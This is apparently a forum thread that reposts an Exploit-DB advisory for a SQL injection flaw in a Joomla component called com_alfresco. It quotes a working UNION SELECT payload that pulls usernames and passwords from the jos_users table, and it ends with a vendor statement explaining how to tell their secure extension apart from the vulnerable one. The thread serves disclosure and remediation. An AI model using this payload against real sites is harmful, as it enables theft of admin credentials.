AnsweredAssumed Answered

Joomla Component com_alfresco SQL Injection Vulnerability

Question asked by morze on Jan 19, 2010
Latest reply on Feb 26, 2010 by hax2010
http://www.exploit-db.com/exploits/10952

# Title: Joomla Component com_alfresco SQL Injection Vulnerability
# EDB-ID: 10952
# CVE-ID: ()
# OSVDB-ID: ()
# Author: FL0RiX
# Published: 2010-01-03
# Verified: no
# Download Exploit Code
# Download N/A
#############################################################
#  Joomla Component com_alfresco SQL Injection Vulnerability
#############################################################
# Author          : FL0RiX
# Name            : com_alfresco
# Greez           : PyskE,Dr.Kacak And All Friends
# Bug Type        : SQL Injection
# Infection       : Admin login bilgileri alinabilir.
# Demo Vuln.      :
http://server/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
#############################################################
< – bug code start – >
path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users–
< – bug code end of – >

How to rectify an error?


Update:
http://blog.joomlatools.eu/2010/01/security-in-third-party-addons.html
"We have investigated this report, and it does not concern the Joomla:Alfresco integration that was published through Joomlatools Labs over a year ago. We have been unable to find the developer of this extension, so we believe it might be a custom extension that is not available on the JED. If you have more information, please let us know.

If you have an Alfresco extension installed, you can identify it by opening /administrator/components/com_alfresco/manifest.xml. If it starts with the following header, you are using our secure extension. If it doesn't, you might be using the vulnerable extension.

<name>Alfresco</name>
<author>Joomlatools</author>
<copyright>Copyright (C) 2008 Joomlatools. All rights reserved.</copyright>
<creationdate>December 2008</creationdate>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<authoremail>info@joomlatools.org</authoremail>
<authorurl>www.joomlatools.org</authorurl>
<version>1.0.0</version>
<description>This component displays an Alfresco repository using CMIS</description>
"

Outcomes